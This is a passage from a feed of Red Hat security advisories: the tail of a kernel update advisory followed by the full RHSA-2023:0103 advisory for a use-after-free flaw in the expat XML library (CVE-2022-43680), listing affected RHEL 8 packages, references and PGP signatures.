python3-perf-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2964  
https://access.redhat.com/security/cve/CVE-2022-4139  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7/i69zjgjWX9erEAQi7og/+NmgRZHeaRAFdkzMYD9KOIoU1RNAlKAfu  
hJf63p0zW4JqRUcn7p+v3qFw84eBJR4Q+dWsx9I8IBKoZ+jZQQlvMOy17eXPnedD  
et7KieOv6+4YXYh9QDD6LzqXjrhdZCFVTbd2Yjhnsvll74o/r4T8at+MGZmAEbsc  
9vWDOyknBmusOnk1GcKKgvrOGfpw/WHKsn/O+iZAT3o1kEHxQoUF689rYGn/Nm56  
i+53s/QlbvXTAmiyMjMWTfM7fR899BRfYfEy0GCrFT7NOcXZ14DwZ4bgLXqeFaHv  
pIVDryqShKr6qUsp0Whb8y6RcqZebL57mCDmnGhrCn3O4n9RMtjn3ApDks9urp0t  
wmrO/TuejHqM9Agjyz2SZSJf23nJSoCxfssHkRPbd/NxPVv2a05iOe/GPrMdmA1D  
bLUKyIeAy8gxNzxIqrH/MmTlyddUVgy/3Oi15etSSRYxG3zPQYAIB3yxdVKxOS4K  
YJhZzL5OMQilO/dP3zYrGSjJkA5CTYU0laMs8QPDpBiKUJU8q/r7XRj6PS6THCOZ  
Xjpf66XYbT42v6Ly3lIvM+w6TZpy2NzxFBfq8Ab8J+ssUYzEpxlD7voZ0ca9rbzv  
V4SVdHzEpMITwqkW1OPjKMWYlFFkMn7RcgzU1jgxTTwN3y1IIJSVCU67NP4K+re7  
Vh1Z7+eM4CY=  
=B1Qw  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0101-01

Red Hat Security Advisory 2023-0103-01 - Expat is a C library for parsing XML documents. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: expat security update  
Advisory ID:       RHSA-2023:0103-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0103  
Issue date:        2023-01-12  
CVE Names:         CVE-2022-43680   
=====================================================================

1. Summary:

An update for expat is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of  
Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives  
a detailed severity rating, is available for each vulnerability from the  
CVE  
link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

Expat is a C library for parsing XML documents.

Security Fix(es):

* expat: use-after free caused by overeager destruction of a shared DTD in  
XML_ExternalEntityParserCreate (CVE-2022-43680)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s)  
listed in the References section.

4. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2140059 - CVE-2022-43680 expat: use-after free caused by overeager destruction of a shared DTD in XML_ExternalEntityParserCreate

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
expat-2.2.5-10.el8_7.1.src.rpm

aarch64:  
expat-2.2.5-10.el8_7.1.aarch64.rpm  
expat-debuginfo-2.2.5-10.el8_7.1.aarch64.rpm  
expat-debugsource-2.2.5-10.el8_7.1.aarch64.rpm  
expat-devel-2.2.5-10.el8_7.1.aarch64.rpm

ppc64le:  
expat-2.2.5-10.el8_7.1.ppc64le.rpm  
expat-debuginfo-2.2.5-10.el8_7.1.ppc64le.rpm  
expat-debugsource-2.2.5-10.el8_7.1.ppc64le.rpm  
expat-devel-2.2.5-10.el8_7.1.ppc64le.rpm

s390x:  
expat-2.2.5-10.el8_7.1.s390x.rpm  
expat-debuginfo-2.2.5-10.el8_7.1.s390x.rpm  
expat-debugsource-2.2.5-10.el8_7.1.s390x.rpm  
expat-devel-2.2.5-10.el8_7.1.s390x.rpm

x86_64:  
expat-2.2.5-10.el8_7.1.i686.rpm  
expat-2.2.5-10.el8_7.1.x86_64.rpm  
expat-debuginfo-2.2.5-10.el8_7.1.i686.rpm  
expat-debuginfo-2.2.5-10.el8_7.1.x86_64.rpm  
expat-debugsource-2.2.5-10.el8_7.1.i686.rpm  
expat-debugsource-2.2.5-10.el8_7.1.x86_64.rpm  
expat-devel-2.2.5-10.el8_7.1.i686.rpm  
expat-devel-2.2.5-10.el8_7.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-43680  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7/i5tzjgjWX9erEAQgotw/7BCtmV6eYMcGDayo+BGOodho987OHD/Sq  
obdHtIuMbhVwA53WG78sijk86V4SMV7IJtOvBgP4HFB6syAyhy50yvLAiw+NYghb  
i0kZ1sokrJVfG9ztrp+ToL5HDkR/s7MDOrhRhP3AHqmiE26o1//W9SOa2XMyN0kU  
jhd949cSVPhS+ztVOU02Yf/gPWqg0lW9Cn1B2T/auXzYFMBeVh2JqmklssXRV6T0  
rPWxtjO4frmm2WDkBcSiwRRD8MH51xm9yxGkwJnvAVcZtpNBU9Hz51asJnGSU/Zn  
OUyIAY91b1JTT9C8omohqY3UVEEAZuq4gDwsQZbLl8nZzkyposKb7DAt1Z319kWa  
cBC6SrSKBW/kx5YIv/FTJoHQLfm5vZxxhVuIBZyB5g9dJr/F2kmuyp3URx1eo42q  
CbQl3LH9BX7IIBzFsCKmnwrcVdUyl61AHdcx2lL71fUSAnjd0FQ0yKN0qKAatQDx  
nuhnLqsAmcHa2yjRb1HXGB9ah5Wi2Wyk6cmpHqoHF/c4jGnCItyQ3STWnWwLrjlU  
eDdWmHEOK0qBjjguaLfc2c3qqUBHqc8hItD300DqizV6dX11hNSPexibwrusZXgk  
gDRd3jRu7bvPJ12Jds/fsnTQ43UtFlNhRj00mTaXdEMOvGWzEH1VEI3Xw97+7FyZ  
vemkyDANWfU=  
=YQE9  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#linux